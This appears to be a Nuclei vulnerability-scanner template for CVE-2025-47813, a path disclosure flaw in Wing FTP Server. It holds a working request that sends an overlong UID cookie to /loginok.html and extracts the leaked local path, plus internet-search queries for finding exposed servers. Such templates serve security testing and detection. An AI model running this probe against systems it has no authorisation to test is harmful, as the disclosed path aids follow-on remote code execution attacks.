id: CVE-2025-47813

info:
  name: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
  author: rcesecurity,pdteam
  severity: medium
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813). The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further exploitation (e.g., CVE-2025-47812) by revealing the application's file system layout.
  impact: |
    Authenticated attackers can supply an overlong UID cookie value to trigger error responses that disclose the full local filesystem path, aiding in further exploitation attempts.
  remediation: |
    Upgrade Wing FTP Server to version 7.4.4 or later, which properly validates UID cookie values.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://www.wftpserver.com
  classification:
    epss-score: 0.26923
    epss-percentile: 0.96461
    cve-id: CVE-2025-47813
    cwe-id: CWE-209
    cvss-score: 5.3
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:NH
  metadata:
    product: wftpserver
    vendor: wing_ftp_server
    verified: false
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,wingftp,unauth,exposure,vuln,kev,vkev

variables:
  longuid: "{{repeat('A', 2048)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/loginok.html"
    headers:
      Cookie: "UID={{longuid}}"
      Content-Type: application/x-www-form-urlencoded
    body: "username=anonymous&password=test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Server Path"
          - "Error"
          - ":\\\\" # Windows path
          - "/usr/" # Linux path
        condition: or

      - type: word
        part: header
        words:
          - "Wing FTP Server"

    extractors:
      - type: regex
        part: body
        regex:
          - '([a-zA-Z]:[\\/][^A\r\n]{10,})'
# digest: 490a00463044022100e9328353210b5257e065057f275f4d798989aa2e7003d252ab3a2b264d82928b021f4a3940583661bb504a0df12dac0de9fffd398380746f484d17b7e2f6b1ed6c:922c64590222798bb761d5b6d8e72950